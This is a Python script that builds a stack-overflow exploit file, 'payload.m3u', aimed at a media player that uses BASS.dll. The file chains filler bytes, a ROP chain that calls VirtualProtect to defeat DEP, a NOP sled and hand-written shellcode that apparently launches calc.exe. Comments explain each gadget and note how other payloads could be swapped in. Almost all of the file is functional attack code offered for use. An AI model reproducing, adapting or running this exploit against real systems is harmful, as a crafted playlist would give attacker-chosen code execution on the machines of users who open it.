import struct
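def p32(x):
    """Pack ``x`` as a 32-bit little-endian unsigned integer.

    Used to lay ROP gadget addresses and constants into the payload in x86
    stack order.  ``struct.error`` is raised if ``x`` does not fit in 32 bits,
    which is the failure mode you want for a mistyped gadget address.
    """
    return struct.pack("<I", x)


# --- Payload layout ----------------------------------------------------------
#   junk | ROP chain | NOP sled | shellcode
#
# Everything below is built as bytes (not str) and written in binary mode, so
# the file is produced byte-for-byte on both Python 2 and 3; the original
# str/text-mode version would newline-translate any 0x0a byte on Windows and
# does not run at all on Python 3.

# Filler up to the saved return address.  1012 is target-specific and nothing
# in this file derives it -- treat it as a fuzzing result that must be
# re-measured for any other build of the player.
junk = b"A" * 1012

# ROP chain.  Every gadget is in BASS.dll / bassmidi.dll, which the mona-style
# annotations mark "ASLR: False, Rebase: False, SafeSEH: False": the chain
# assumes both modules sit at their preferred bases (0x100xxxxx / 0x1060xxxx)
# and breaks if either is rebased.
#
# Intended effect, per the gadget comments and the standard PUSHAD layout:
# load EDI/ESI/EBP/EBX/EDX/ECX/EAX so that "PUSHAD # RETN" turns into
# VirtualProtect(lpAddress=ESP, dwSize=0x269, flNewProtect=0x40
# (PAGE_EXECUTE_READWRITE), lpflOldProtect=0x101082ca), with EBP as the return
# address.  "POP EBP # RETN" then discards the pushed EAX slot and returns into
# "JMP ESP", which lands in the NOP sled.
rop_chain = b"".join([
    p32(0x10016218),  # POP EDI # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
    p32(0x10010180),  # "retn" (ROP NOP) | {PAGE_EXECUTE_READWRITE} [BASS.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.3
    p32(0x1001e377),  # POP ESI # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
    p32(0x100177e4),  # "jmp [eax]" -> calls VirtualProtect through the import slot in EAX | [BASS.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.3
    p32(0x100106e1),  # POP EBP # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
    p32(0x100106e1),  # -> EBP: VirtualProtect's return address; pops the pushed EAX (ptr VirtualProtect) off the stack, then RETN into JMP ESP
    p32(0x10015f77),  # POP EAX # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
    p32(0xfffffd97),  # -0x269 = 0xfffffd97 => EAX (negated form avoids NUL bytes in the size)
    p32(0x10014db4),  # NEG EAX # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}   -> EAX = 0x269
    p32(0x10032f72),  # XCHG EAX,EBX # RETN 0x00 ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}   -> EBX = dwSize
    p32(0x10015f77),  # POP EAX # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
    p32(0xffffffc0),  # -0x40 = 0xffffffc0 => EAX
    p32(0x10014db4),  # NEG EAX # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}   -> EAX = 0x40
    p32(0x10038a6c),  # XCHG EAX,EDX # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}   -> EDX = flNewProtect
    p32(0x100163c7),  # POP ECX # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
    p32(0x101082ca),  # -> ECX = lpflOldProtect: writable location where the old protection is stored
    p32(0x10015f77),  # POP EAX # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
    p32(0x1060e25c),  # ptr VirtualProtect() in bassmidi (base + 0x0000e25c) : 0x7c801ad4 (ptr to kernel32.virtualprotect).
                      # The chain dereferences this import slot at run time, so only the slot address (not the
                      # resolved kernel32 value, which is OS-build specific) has to be right.
    p32(0x1001d7a5),  # "pushad" | {PAGE_EXECUTE_READWRITE} [BASS.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.3
    p32(0x100222c5),  # jmp esp | {PAGE_EXECUTE_READWRITE} [BASS.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.3
])

# Short sled so a slightly-off landing still reaches the shellcode.
nops = b"\x90" * 10

# 112 bytes of hand-written x86 shellcode.  The embedded "Crea"/"oces"
# comparisons and the pushed "calc" string suggest it walks the export table
# for CreateProcess and spawns calc.exe -- NOTE(review): inferred from the
# bytes, not documented here; confirm before swapping in another payload.
shellcode = (
    b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    b"\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    b"\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    b"\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    b"\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    b"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    b"\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
)

payload = junk + rop_chain + nops + shellcode

# Sanity check before writing: an .m3u is consumed as a text playlist, so NUL
# and line terminators are presumed bad characters (the NEG-based constants in
# the chain are presumably there to avoid them).  NOTE(review): the real
# badchar set for this target is not recorded in this file -- confirm it and
# extend this tuple if the shellcode or gadgets change.
_ASSUMED_BADCHARS = (b"\x00", b"\x0a", b"\x0d")
_found_badchars = [b for b in _ASSUMED_BADCHARS if b in payload]
if _found_badchars:
    raise ValueError("payload contains presumed bad chars: %r" % (_found_badchars,))

print("[+] Creating .m3u payload of size " + str(len(payload)) + ".")
# Binary mode is mandatory: text mode would translate 0x0a -> 0x0d0a on Windows
# and silently corrupt the chain/shellcode.
with open("payload.m3u", "wb") as out:
    out.write(payload)
print("[+] Payload created successfully.")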